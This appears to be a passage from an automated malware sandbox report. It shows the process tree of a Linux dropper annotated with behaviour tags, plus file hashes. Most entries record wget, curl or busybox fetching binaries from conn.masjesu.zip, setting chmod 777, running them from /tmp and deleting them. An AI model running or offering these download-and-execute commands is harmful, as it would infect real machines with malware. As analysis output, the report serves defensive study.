- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ2⤵
- System Network Configuration Discovery
PID:939
-
-
/bin/chmodchmod 777 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ./28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ2⤵PID:942
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi2⤵
- System Network Configuration Discovery
PID:943
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod 777 TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi./TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi2⤵PID:949
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa762⤵PID:950
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa762⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa762⤵
- System Network Configuration Discovery
PID:953
-
-
/bin/chmodchmod 777 RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa762⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76./RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa762⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa762⤵PID:956
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi2⤵PID:957
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi2⤵
- System Network Configuration Discovery
PID:960
-
-
/bin/chmodchmod 777 zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi./zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi2⤵PID:963
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq2⤵
- System Network Configuration Discovery
PID:964
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq2⤵
- System Network Configuration Discovery
PID:967
-
-
/bin/chmodchmod 777 MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq./MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq2⤵PID:970
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls2⤵
- System Network Configuration Discovery
PID:971
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls2⤵
- System Network Configuration Discovery
PID:974
-
-
/bin/chmodchmod 777 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls./59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls2⤵PID:977
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB2⤵
- System Network Configuration Discovery
PID:978
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB2⤵
- System Network Configuration Discovery
PID:981
-
-
/bin/chmodchmod 777 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB./4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB2⤵PID:984
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh2⤵
- System Network Configuration Discovery
PID:985
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh2⤵
- System Network Configuration Discovery
PID:988
-
-
/bin/chmodchmod 777 wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh./wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh2⤵PID:991
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA52⤵PID:992
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:993
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA52⤵
- System Network Configuration Discovery
PID:995
-
-
/bin/chmodchmod 777 eZda7fFJZSYphLM2m311BXmM8H6QEsXcA52⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5./eZda7fFJZSYphLM2m311BXmM8H6QEsXcA52⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm eZda7fFJZSYphLM2m311BXmM8H6QEsXcA52⤵PID:998
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi2⤵
- System Network Configuration Discovery
PID:999
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1000
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi2⤵
- System Network Configuration Discovery
PID:1002
-
-
/bin/chmodchmod 777 B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi2⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi./B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi2⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi2⤵PID:1005
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97